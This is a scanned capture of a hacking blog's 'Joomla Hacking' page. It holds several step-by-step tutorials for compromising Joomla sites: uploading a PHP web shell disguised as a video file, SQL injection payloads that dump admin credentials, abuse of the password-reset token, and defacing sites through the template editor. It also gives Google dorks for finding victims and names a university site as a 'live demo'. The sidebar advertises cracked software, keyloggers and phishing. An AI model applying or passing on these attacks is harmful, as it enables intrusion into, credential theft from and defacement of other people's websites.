systechict.blogspot.com
Open in
urlscan Pro
2607:f8b0:4004:c1b::84
Public Scan
URL:
https://systechict.blogspot.com/search/label/Joomla%20Hacking
Submission: On November 27 via api from US — Scanned from CA
Submission: On November 27 via api from US — Scanned from CA
Form analysis 1 forms found in the DOM
GET search
<form action="search" id="searchform" method="get">
<input id="q" name="q" onblur="if (this.value == '') {this.value = 'Search';}" onfocus="if (this.value == 'Search') {this.value = '';}" type="text" value="Search">
<input id="searchsubmit" type="hidden">
</form>Text Content
ISMAIL HOSSAIN
* Home
* About
* Color
* Site Map
* Help
* Contact
THURSDAY, AUGUST 30, 2012
JOMSOCIAL ~ JOOMLA SHELL UPLOAD VULNERABILITY
Stuff you need:
Firefox
A Shell
Tamper Data
Vulnerable Site
& a Brain :)
Preparation:
1. Get a shell here. (recommend: c99.php)
2. Download Tamper Data
3. Find a vuln site. *refer to Dorking*
Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos
Preparing your Shell:
1. Download a shell.
2. Put it in a folder (ex. "myshell")
3. Copy the shell to the same folder and rename it to "yourshell.php.flv"
4. Now in your folder you have 2 files, "myshell.php" & "myshell.php.flv".
Getting Access to site:
1. Register a fake account.
2. Active your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose upload video from computer.
Uploading your Shell:
Upload a video from your computer, please note that if you only see Add video
from URL that means the site is not vuln.
The reason for having created a file called "myshell.php.flv", is to trick the
uploader intothinking that you are uploading a FLV file.
Uploading shell:
1. Go to upload page, click on add video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your "myshell.php.flv".
5. Input Title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper data will then show you if you want to tamper, uncheck continue to
tamper then click on tamper.
9. Look for "myshell.php.flv" then delete the .flv part meaning you will have
"myshell.php" left.
10. SUBMIT.
11. Wait for it, and you will see the successful upload page.
12. Congrats you have uploaded a shell.
Shell location:
1. Go to http://[slave]/images/originalvideos/
2. There you will find folders named in numbers. (yours is most likely the
last/bottom folder)
3. Most of the folders will contain .flv, .avi && etc etc.
4. Your folder will contain a random generated name with a PHP file extension.
5. Open your "random.php"
6. And your IN!
Read more ...>>
WEDNESDAY, AUGUST 29, 2012
HOW TO HACK JOOMLA : TUTORIAL
1- Finding Exploit And Target
Google dork: inurl:"option=com_mytube"
Type that Dork in Google.
2- Inject Target
Find a url like this:
http://site.com/index.php?option=com_mytube&Itemid=88..
Now replace the url like this:
Click here to view: http://pastebin.com/ZxxU8Nsr
If the site is vulnerable, you can see something like this:
We can see username, email and activation code. (username:email:activation code)
Now, let this page open and open a new page.
3- Admin password reset
Go to:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request
Type the email adress found in step 2 and press Submit.
The activation code should be resetted.
Return to the first page, refresh the page and take the new activation code.
Paste him in the token and press Submit.
problem with token.. :((
UPDATE: Joomla! 1.5.16 now hashes the reset token
if you see a thing like :$1$14411: after the activation code, it will not work
4- Admin Login
If you done everything ok, your Password page will load. Enter your new
password...
After that go to:
http://www.site.com/administrator/
Standard Joomla portal content management system
Enter the username (found in step 2) and your new password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are
done!!
Read more ...>>
JOOMLA PASSWORD RESET VULNERABILITY
Joomla Password Reset vulnerability : Explain with Live demo :
website : http://miit.unikl.edu.my/
The tricks is like this:
1. Go to http://miit.unikl.edu.my/index.php?option=com_user&view=reset&layout=confirm
then you will be prompt for a token in which the token is suppose already sent to your email,
2. Now, put a single quote ' into field text box "token" and Click OK.
> The sql query then will be looks like this :
> "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "3. Write new password for admin
4. Go to url : http://miit.unikl.edu.my/administrator/
5. Login admin with your new password
** update: miit joomla was patched.. Try any site else :P
Read more ...>>
JOOMLA HACKING TUTORIAL
Introduction : Joomla! as Stable-Full Package is probably unhackable and
If someone tells that HACKED Joomla, talking rubbish!!!
But people still hacked sites that use Joomla as Content Management System?!?
Joomla is made of components and modules and there are some developers apart
from
official team that offer their solutions to improve Joomla.
That components and modules mede by that other developers are weak spots!
I hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog
v1.1, but I can't tell that I hacked Joomla!
Finding Exploit And Target : Those two steps could go in different order, depend
what you find first target or exploit...
Google dork: inurl:"option=com_idoblog"
Comes up with results for about 140,000 pages
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vulnrablity
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,
11,12,13,14,15,16+from+jos_users--
Exploit can be separated in two parts:
Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don't exist, exploit won't
worked (not completely confirmed)
Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1
5,16+from+jos_users--
This part looking for username and password from jos_users table
Testing Vulnerability
Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick 'Load images
automatically'
Go to:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load normally...
Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content blog Profile Admin
Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
Site is vulnerable
Inject Target
Open reiluke SQLiHelper 2.7
In Target copy
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow standard steps until you find Column Name, as a result we have
Notice that exploit from inj3ct0r wouldn't work here because it looking for
jos_users table and as you can see
our target use jos153_users table for storing data
Let Dump username, email, password from Column Name jos153_users. Click on Dump
Now
username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI
Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created,
they are hashed with a
32 character salt that is appended to the end of the password string. The
password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time...
The easiest way to hack is to reset Admin password!
Admin Password Reset
Go to:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request
Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press
Submit.
If you find right admin email, Confirm your account. page will load, asking for
Token:
Finding Token
To find token go back to reiluke SQLiHelper 2.7 and dump username and activation
from Column Name jos153_users
username: admin
activation: 5482dd177624761a290224270fa55f1d
5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and
pres Submit.
If you done everything ok, Rest your Password page will load. Enter your new
password...
After that go to:
http://www.site.com/administrator/
Standard Joomla portal content management system
Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are
done!!!
To make admin life more miserable, click on admin in main Joomla window and in
User Details page change admin E-mail
Read more ...>>
Older Posts
Subscribe to: Posts (Atom)
MENU
* 3xp1r3 Cyber Army
* Android
* Anonymous
* Antivirus
* Antivirus Software
* Audio Tool
* Bollywood Movies
* Browser Software
* C++ book/Tutorials
* Coding+web development
* Converter
* Design Software
* dis
* DNN Tutorial
* Download
* Driver Software
* Ebook
* Education
* Entertainmaint
* Facebook Hacking
* Graphics Software
* Hacker info
* Hacking
* Hacking Software
* Hacking Tutorial
* Hide IP Software
* IIS Exploit
* Internet
* Internet Software
* IP Hide
* Islamic Software
* Joomla Hacking
* KeyGen
* Keylogger
* LFI
* Live TV
* MISCELLANEOUS
* Mobile
* Muslim cyber war
* Nokia
* OS
* Password
* Phishing
* Photo Edite
* PHP Shell
* Portable
* Portable Software
* Python
* Rats / Keyloggers
* Security
* SEO
* SEO / Backlinks
* Server Rooting
* Shell Upload
* SQL Injection
* TheHackersArmy
* Tips and Tricks
* Utilities
* Utilities Software
* Vedio Tools
* Virus
* Web hacking
* Web Master
* WebCam
* What Is ?
* Wifi
* Windows
* Windows 8
* Windows Tips and Tricks
* Wireless Cracker
* Wordpress Hacking
* WP-plugin
* Writing software
* XSS Hacking
MOST VIEW
* Simple Port Forwarding Pro v3.0.20 + Serial Key | Crack | Keygen | Patch |
Activator
Simple Port Forwarding works with WebPages and indirectly together with your
router. creating it a secure program to use. Its no tot...
* Web Data Extractor 8.3 Pro + Reg Key | Crack | Keygen | Patch | Serial Key |
Activator
A powerful extraction link / Web data utility. Extract URL, meta tag (title,
description, keywords), e-mail addresses, phone numbers, fax fr...
* Anti Deep Freeze v0.5 [Remove Deep Freeze Password] | Crack | Patch |
You forgot the password ? you can't disable Deep Frezze Now we have The
Solution with: Anti Deep Freeze v0.5 by AT4RE ! Supported Versi...
* Download Norton_ Internet_ Security_ 2012 19.7.1.5 Final with Crack/sirial
Today i want to share a great software . Symantec's Norton AntiVirus 2012 –
Winning protection against viruses, spyware, and other mali...
* Havij v1.17 Pro Cracked | Crack | Patch | Key | Licence
Havij Pro v1.17 CRACKED - in fact, the new version over the old favorites
with Havij Crack What\'s New? • Dump all • New bypass techniq...
* DNSS Domain Name Search Software 2.0.3.0 + Patch + Crack + Serial Key |
Activator
DNSS name Search package is that the best to use toolkit and most price
effective package on the marketplace for finding nice site domain n...
* 52 uk site hacked by Rude_Thunder at All Muslim Hackers.
Our Prophet is our Love. If someone try to insult our love, We won't leave
them alone. !!! They are making insulted movie againts us a...
* R-Studio 6.3 Build 153961 Network Edition (x86x64) Portable | Crack | Patch |
Activator
R-Studio may be a family of powerful and efficient undelete and knowledge
recovery computer code. authorized by the new distinctive knowle...
* WinRAR 2013 v5.00.6 Final (32&64-bit) Fully Activated | Crack | Patch |
Keygen | Serial Key
WinRAR could be a powerful archive manager. RAR files will typically compress
content by eight p.c to fifteen p.c quite nothing files will. ...
* Windows 8 and Office 2013 Permanent Activator Ultimate v15.1.1 Work 100% |
Crack | Patch | Keygen
This Activator contains new uses for Autonomous Activation For All Edition
Activator Microsoft Windows (8, 7, Vista, XP, Server) and Office....
* Home
* About the Blo
* Buy Theme
* Plugins
* Help
* DMC
* © 2013 Most IT Info
Designed by: ITsoft
SPONSOR
To Top Page Up Page Down To Bottom Auto Scroll Stop Scroll